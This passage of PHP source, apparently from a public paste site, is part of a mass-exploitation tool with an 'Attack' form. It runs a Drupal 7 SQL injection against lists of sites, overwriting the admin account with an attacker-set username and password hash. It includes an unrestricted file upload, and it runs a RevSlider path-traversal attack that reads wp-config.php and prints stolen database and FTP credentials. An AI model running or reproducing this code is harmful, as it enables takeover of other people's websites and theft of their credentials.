  986. <form method='post' action=''>
  987. <textarea name='url' rows='30' cols='50'>
  988. http://www.site.com
  989. http://www.site2.com
  990. </textarea><br><br>
  991. <input type='submit' name='submit' value='Attack'>
  992. </form>
  993. <br>
  994. ";
  995. $drupal7 = $_GET['drupal7'];
  996. if($drupal7 == 'drupal7'){
  997. $filename = $_FILES['file']['name'];
  998. $filetmp = $_FILES['file']['tmp_name'];
  999. echo "<form method='POST' enctype='multipart/form-data'>
  1000. <input type='file'name='file' />
  1001. <input type='submit' value='drupal !' />
  1002. </form>";
  1003. move_uploaded_file($filetmp,$filename);
  1004. }
  1005. error_reporting(0);
  1006. if (isset($_POST['submit'])) {
  1007. function exploit($url) {
  1008. $post_data = "name[0;update users set name %3D 'exeuser' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  1009. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  1010. ", 'content' => $post_data));
  1011. $ctx = stream_context_create($params);
  1012. $data = file_get_contents($url . '/user/login/', null, $ctx);
  1013. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  1014. $fp = fopen("xpld.txt", 'a+');
  1015. fwrite($fp, "Exploitied User: exeuser Pass: admin =====> {$url}/user/login");
  1016. fwrite($fp, "
  1017. ");
  1018. fwrite($fp, "--------------------------------------------------------------------------------------------------");
  1019. fwrite($fp, "
  1020. ");
  1021. fclose($fp);
  1022.  
  1023. echo "<font color='gold'><b>Success:<font color='red'> exeuser</font> Pass:<font color='red'> admin</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
  1024. } else {
  1025. echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
  1026. }
  1027. }
  1028.  
  1029. $urls = explode("
  1030. ", $_POST['url']);
  1031. foreach ($urls as $url) {
  1032. $url = @trim($url);
  1033. echo exploit($url);
  1034. }
  1035. }
  1036. }
  1037. if(isset($_REQUEST['revslider'])){
  1038. echo "<body>
  1039. <center>
  1040. mass revslider exploiting by mr.magnom recoded by exeuser<br>
  1041. <form method='post'>
  1042. <textarea name='sitessss' cols='50' rows='12'></textarea><br>
  1043. <input type='submit' name='comeon' value='get'>
  1044. </form>
  1045. ";
  1046. }
  1047. function findit($mytext,$starttag,$endtag) {
  1048. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
  1049. $posRight = stripos($mytext,$endtag,$posLeft+1);
  1050. return substr($mytext,$posLeft,$posRight-$posLeft);
  1051. }
  1052. error_reporting(0);
  1053. set_time_limit(0);
  1054. $ya=$_POST['comeon'];
  1055. $co=$_POST['sitessss'];
  1056.  
  1057. if($ya){
  1058. $e=explode("\r\n",$co);
  1059. foreach($e as $bda){
  1060. //echo '<br>'.$bda;
  1061. $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  1062. $dn=($bda).($linkof);
  1063. $file=@file_get_contents($dn);
  1064. if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  1065. echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
  1066. echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
  1067. echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
  1068. echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
  1069. echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
  1070. echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
  1071. }
  1072. elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  1073. echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
  1074. echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
  1075. echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
  1076. echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
  1077. echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
  1078. }
  1079. else{echo "<center><font face='courier' color='yellow' >".$bda." ----> not infected </font></center>";}
  1080. echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
  1081. }
  1082.  
  1083. }
  1084.  
  1085. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!